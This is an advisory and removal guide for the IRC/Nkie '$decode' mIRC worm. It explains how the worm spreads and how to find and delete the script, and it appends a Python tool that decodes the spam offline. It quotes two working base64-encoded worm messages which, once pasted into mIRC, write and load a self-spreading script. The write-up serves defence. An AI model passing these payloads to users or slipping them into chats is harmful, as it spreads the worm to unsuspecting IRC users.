IRC/Nkie Worm

Description:
The IRC/Nkie worm is among the top five most common IRC worms today. It is
also the least documented worm on the internet.

This worm is commonly called the $decode worm on IRC. The original $decode
is a mIRC script named nkie.txt. It is triggered when someone types !list in
any channel an infected user is in. The trigger is a simple mIRC code sent
encrypted to the person who typed the !list command.

Today there are many variants, all of which spam encrypted mIRC code to
anyone that either types a trigger, or joins/parts a channel the infected
user is in. Some variants have a timer in the code that waits for a few
seconds, then spams the code only if the user is not opped. This is to
prevent channel moderators from seeing the spam and kicking the infected
user. Most people do not even realize they have this worm until they are
kicked from an IRC channel with instructions to join #NoHack. To date the
worm has no destructive payload, but that could change. As with any worm,
care should be taken when removing it.

Technical Details:
The worm spreads by spamming people over IRC networks with messages similar
to these:

<cooleun> hey Golcor to get OPs use this hack in the chan but SHH!
//$decode( d3JpdGUgxCAkcmVhZCgkc2NyaXB0LG4sMSk= ,m) |
$decode( LmxvYWQgLXJzIMQ= ,m)

<^BlueyEBOy^> STOP SPAM, USE THIS COMMAND: //write nospam
$decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZy
AkbmljayBTVE9QIFNQQU0sIFVTRSBUSElTIENPTU1BTkQ6AzQgLy93cml0
ZSBub3NwYW0gJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcm
lwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIG5vc3Bhb
SAkY2hyKDEyNCkgLy9tb2RlICQgJCsgbWUgK1IgfSB9,m) | .load -rs
nospam | //mode $me +R

It works with the $decode() and $encode() identifiers built into the mIRC
scripting language. When a user gets spammed with one of these messages, and
then copies the text into the edit box, the text is interpreted by mIRC and
executed as if the user had typed the command in plainly. Although the
scripts vary on what they say, the theme is the same: They write a small
script to the mIRC folder, load it into the remote section of mIRC, and then
go to work spamming others, enticing them to copy and paste too. Any name
can be given to the file. Some common file names include:
Ä
chat
dab.txt
god.dll
hack
mirc32.ini
nkie.txt
nospam
twg.txt
s.txt
vv.pif

Solution:
Because it is a simple spam worm, removal is easy: simply unload and delete
the script. If you have a lot of scripts loaded you will have to determine
which script(s) are spamming. One easy way to do this is to copy the last
part of the actual message your client is spamming and /echo it back to
yourself in the status window. Taking the first example from above, you
would copy $decode( LmxvYWQgLXJzIMQ= ,m) to the clipboard. Then in the
status window type:

//echo -a . $decode( LmxvYWQgLXJzIMQ= ,m)

This will reveal the file name of the script. All $decode worms will have a
load command after the final “|” character. In this case we see that .load
-rs Ä is the final command, giving us the file name Ä, or ASCII character
142. You can type this letter by holding down the ALT key and pressing 142
on the numeric pad, then release the ALT key. Regardless of the temptation
or promises, do not copy and paste anything in mIRC you do not understand.
This worm is a new spin on an old trick. The same thing used to be achieved
by getting users to copy endless $chr() characters into the edit box, which
will execute any command given as if it was typed normally.
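The decoding step described in the Solution section, and the $chr() trick mentioned last, can be carried out offline rather than in the mIRC edit box. The following Python script is an added example and is not part of the original write-up: it takes the two spam messages quoted above (re-joined onto single lines as constructed samples), reverses each $decode(...,m) with a base64 decode, expands literal $chr(N) tokens into the characters they stand for, and then lists every script file the expanded command line would load, so the operator knows which file to /unload -rs and delete. Two assumptions are mine: decoded bytes are shown in the Windows ANSI code page (cp1252), as mIRC on a Western Windows install would display them, and numeric-pad ALT codes are computed in the OEM code page (cp437), which is why the file name Ä maps to ALT+142 as the text states.

```python
import base64
import re
from typing import List

# Constructed samples: the two spam messages quoted in the write-up, joined
# back onto single lines (the base64 blob of the second one is line-wrapped
# in the text). Nothing here is executed as mIRC script; it is only parsed.
SAMPLE_1 = (
    "//$decode( d3JpdGUgxCAkcmVhZCgkc2NyaXB0LG4sMSk= ,m) | "
    "$decode( LmxvYWQgLXJzIMQ= ,m)"
)
SAMPLE_2 = (
    "//write nospam $decode("
    "b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZy"
    "AkbmljayBTVE9QIFNQQU0sIFVTRSBUSElTIENPTU1BTkQ6AzQgLy93cml0"
    "ZSBub3NwYW0gJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcm"
    "lwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIG5vc3Bhb"
    "SAkY2hyKDEyNCkgLy9tb2RlICQgJCsgbWUgK1IgfSB9,m) | .load -rs "
    "nospam | //mode $me +R"
)

# $decode(<base64>,m) as it appears in the messages; the blob may be padded
# with spaces inside the parentheses.
DECODE_RE = re.compile(r"\$decode\(\s*([A-Za-z0-9+/=]+)\s*,\s*m\s*\)")
# $chr(N) with a literal number, e.g. $chr(124) is "|", the command separator.
CHR_RE = re.compile(r"\$chr\((\d{1,3})\)")
# A load command in any of its spellings: ".load -rs file", "/load", "//load".
LOAD_RE = re.compile(r"(?:^|[\s|])[./]{0,2}load\s+-\S+\s+(\S+)", re.IGNORECASE)


def mirc_decode(blob: str) -> str:
    """Reverse $decode(text,m): base64 to bytes, then bytes to text in the
    Windows ANSI code page (cp1252, an assumption about the victim's locale)."""
    return base64.b64decode(blob).decode("cp1252", errors="replace")


def expand_message(msg: str) -> str:
    """Substitute every $decode(...,m) with its plaintext and expand literal
    $chr(N) tokens, giving the command line mIRC would actually run."""
    plain = DECODE_RE.sub(lambda m: mirc_decode(m.group(1)), msg)
    return CHR_RE.sub(lambda m: chr(int(m.group(1))), plain)


def load_targets(msg: str) -> List[str]:
    """Script file names the message would load, in order of first appearance.
    These are the files to unload (/unload -rs <name>) and delete."""
    names: List[str] = []
    for name in LOAD_RE.findall(expand_message(msg)):
        if name not in names:
            names.append(name)
    return names


def alt_codes(name: str) -> List[int]:
    """Numeric-pad ALT codes for each character of a file name. ALT+<n> with
    no leading zero uses the OEM code page (cp437), so "Ä" comes out as 142."""
    return list(name.encode("cp437", errors="replace"))


if __name__ == "__main__":
    for sample in (SAMPLE_1, SAMPLE_2):
        print("expanded :", expand_message(sample))
        for name in load_targets(sample):
            print("loads    :", repr(name), "ALT codes:", alt_codes(name))
```

Run as-is, the first sample expands to `//write Ä $read($script,n,1) | .load -rs Ä` and reports the file name Ä with ALT code 142; the second expands to the full `on !+1:join` remote script and reports `nospam`. Expanding $chr(124) into a real "|" is what makes the load command inside the second payload visible as a separate command rather than as one long string.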